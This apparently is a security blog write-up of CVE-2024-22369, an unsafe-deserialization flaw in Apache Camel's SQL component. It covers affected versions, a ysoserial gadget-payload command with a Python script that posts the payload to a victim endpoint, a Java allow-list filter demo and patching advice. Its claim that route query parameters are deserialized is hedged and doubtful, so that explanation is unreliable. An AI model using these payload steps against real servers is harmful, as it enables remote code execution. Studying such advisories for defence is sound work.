CVE-2024-22369 uncovers a serious vulnerability in the Apache Camel SQL component resulting from unsafe deserialization of untrusted data. This flaw affects critical Apache Camel versions, specifically:
- 4.1.0 before 4.4.0 (the full list of affected ranges is given under "Who Is Affected?" below)
If you use the SQL component in these versions, attackers may be able to execute arbitrary code by sending crafted serialized Java objects. Immediate upgrade to a patched version is strongly recommended.
What’s the Deserialization Vulnerability?
Deserialization issues happen when an application accepts data (usually over a network) that was serialized (turned into a byte stream) by someone else, and trusts it without validation. If this data is malicious, the attacker can trigger code execution on the system.
In Apache Camel’s SQL component, unsafe deserialization occurs when processing inputs (for example, SQL query parameters) originating from user-controlled sources.
Who Is Affected?
- Apache Camel 3.x users: If you're on any version from 3.0.0 up to but not including 3.21.4, or you are on 3.22.0 before 3.22.1, you are vulnerable.
- Apache Camel 4.x users: If you're between 4.0.0 and 4.0.3, or between 4.1.0 and 4.3.x, you are vulnerable.
How Does the Exploit Work?
1. Crafted Data Injection: The attacker submits a malicious serialized object as a parameter to a Camel route using the SQL component.
2. Unsafe Deserialization: The vulnerable Camel version deserializes this object without proper checks.
3. Remote Code Execution: The attacker’s object is set up to execute arbitrary code when deserialized (using a Java gadget chain).
4. System Compromise: The code runs on the Camel server, potentially leading to full server takeover.
Suppose you have a publicly accessible Camel route like this:
<route>
  <from uri="jetty:http://...:8080/orders"/>
  <to uri="sql:INSERT INTO orders (description) VALUES (:#description)?dataSource=dataSource"/>
</route>
If an attacker controls the description parameter and it's deserialized unsafely, they could inject a serialized Java gadget payload instead of plain text.
Exploit Code Example
Below is a simplified exploit snippet demonstrating how an attacker might send a malicious serialized object to a vulnerable Camel SQL component.
Step 1: Create a Malicious Serialized Object (Java)
This example uses ysoserial to generate a payload that opens Calculator:
java -jar ysoserial.jar CommonsCollections5 'calc.exe' > payload.bin
Step 2: Send the Payload to the Vulnerable Endpoint (Python)
import requests

# Read the serialized payload generated in step 1
with open('payload.bin', 'rb') as f:
    payload = f.read()

# Send it as the "description" parameter to the vulnerable endpoint
res = requests.post(
    "http://victim-server:8080/orders",
    files={"description": ("payload.bin", payload)}
)
print("Status code:", res.status_code)
Upgrade Steps
1. Update your Maven/Gradle dependency to the patched version.
2. Test to ensure your routes work as expected.
Additional Defenses:
- Do not trust user-controlled input for deserialization.
- Use allow-lists for serializable types, or disable Java serialization for parameters entirely (if possible).
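The allow-list defense above, as an added example that is not Apache Camel's own code: a standalone Java class (hypothetical names SafeDeserializationDemo and OrderDescription, both constructed for this demo) that attaches a JEP 290 ObjectInputFilter to an ObjectInputStream so that only one expected class can be deserialized and every other class, including any gadget-chain type, is rejected before its class is resolved. The rejected case uses a plain java.util.HashMap as a harmless stand-in for an unexpected object graph.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;

/** Hypothetical allow-list deserializer written for this article; not part of Apache Camel. */
public class SafeDeserializationDemo {

    /** Stand-in for the only type a route parameter is expected to carry (constructed for this demo). */
    static final class OrderDescription implements Serializable {
        private static final long serialVersionUID = 1L;
        final String text;
        OrderDescription(String text) { this.text = text; }
    }

    /**
     * Allow-list filter in ObjectInputFilter pattern syntax: the single named class is
     * accepted, nesting depth is capped, and the trailing "!*" rejects every other class.
     * Nested classes are matched by their binary name, hence the '$' in the pattern.
     */
    static final ObjectInputFilter ALLOW_LIST = ObjectInputFilter.Config.createFilter(
            "SafeDeserializationDemo$OrderDescription;maxdepth=5;!*");

    /** Deserializes untrusted bytes; the filter is consulted before any class is resolved. */
    static Object deserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(ALLOW_LIST);
            return in.readObject();
        }
    }

    /** Helper used only to build sample input for the demo. */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Expected type: passes the allow-list.
        byte[] expected = serialize(new OrderDescription("10 widgets"));
        OrderDescription ok = (OrderDescription) deserialize(expected);
        System.out.println("accepted: " + ok.text);

        // Unexpected type: the filter rejects it and readObject throws InvalidClassException.
        byte[] unexpected = serialize(new HashMap<String, String>());
        try {
            deserialize(unexpected);
            System.out.println("BUG: unexpected type was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage()); // "filter status: REJECTED"
        }
    }
}
```

Run it with `java SafeDeserializationDemo.java` on JDK 11 or later. The important property is that rejection happens inside the stream before `resolveClass` runs, so a gadget class is never loaded; a process-wide default can also be set with the `jdk.serialFilter` system property, which is the simpler option when you cannot touch the code that calls `readObject`.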
References
- Apache Camel Security Advisory (CVE-2024-22369)
- NVD Entry for CVE-2024-22369
- ysoserial Gadget Chains
- OWASP Deserialization Cheatsheet
Conclusion
CVE-2024-22369 is a high-impact, easy-to-exploit deserialization flaw in Apache Camel’s SQL component. Every user of affected Camel versions should patch immediately and audit their routes for unsafe deserialization practices. If you’re not ready to upgrade, restrict access to vulnerable endpoints as a temporary risk reduction—but don’t delay updating for the long run!
Timeline
Published on: 02/20/2024 15:15:10 UTC
Last modified on: 11/05/2024 20:35:19 UTC